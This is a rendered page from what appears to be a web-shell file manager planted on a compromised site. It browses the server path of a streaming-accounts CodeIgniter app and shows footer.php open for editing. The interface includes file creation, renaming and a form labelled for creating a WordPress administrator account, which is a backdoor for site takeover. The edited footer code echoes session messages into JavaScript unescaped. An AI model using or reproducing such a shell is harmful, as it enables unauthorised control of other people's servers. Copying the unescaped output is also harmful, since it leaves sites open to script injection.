π File Editor (IP: )
π Root Folder:
π Buka
π Daftar isi: /home/goblinst/public_html/cuentas.goblinstreaming21.com/application/views
β¬ οΈ Kembali ke folder sebelumnya
π
clientes
π
configuraciones
π
errors
π
footer.php
π
header.php
π
index.html
π
login
π
panel
π
perfiles
π
productos
π
servicios
π
usuarios
π
ventas
π Folder Baru:
+ Buat
π File Baru:
+ Buat
βοΈ Rename:
clientes
configuraciones
errors
footer.php
header.php
index.html
login
panel
perfiles
productos
servicios
usuarios
ventas
β‘οΈ
Rename
β Tambah User WordPress (folder aktif)
π€ Username:
π§ Email:
π Password:
β Buat User WP (admin)
π Mengedit: footer.php
<?php if ($this->session->flashdata("confirmacion")) { ?> <script type="text/javascript"> iziToast.success({ title: 'ConfirmaciΓ³n', message: "<?php echo $this->session->flashdata("confirmacion"); ?>", position: 'topRight', html: 'true' }); </script> <?php $this->session->set_flashdata("confirmacion", ""); ?> <?php } ?> <?php if ($this->session->flashdata("informacion")) { ?> <script type="text/javascript"> iziToast.info({ title: 'InformaciΓ³n', message: "<?php echo $this->session->flashdata("informacion"); ?>", position: 'topRight', html: 'true' }); </script> <?php $this->session->set_flashdata("informacion", ""); ?> <?php } ?> <?php if ($this->session->flashdata("error")) : ?> <script type="text/javascript"> iziToast.error({ title: 'Error', message: "<?php echo $this->session->flashdata("error"); ?>", position: 'topRight', html: 'true' }); </script> <?php endif; ?> </body> </html>
πΎ Simpan
π Replace Teks (Ctrl+H)
Cari:
Ganti Dengan:
Replace All
Tutup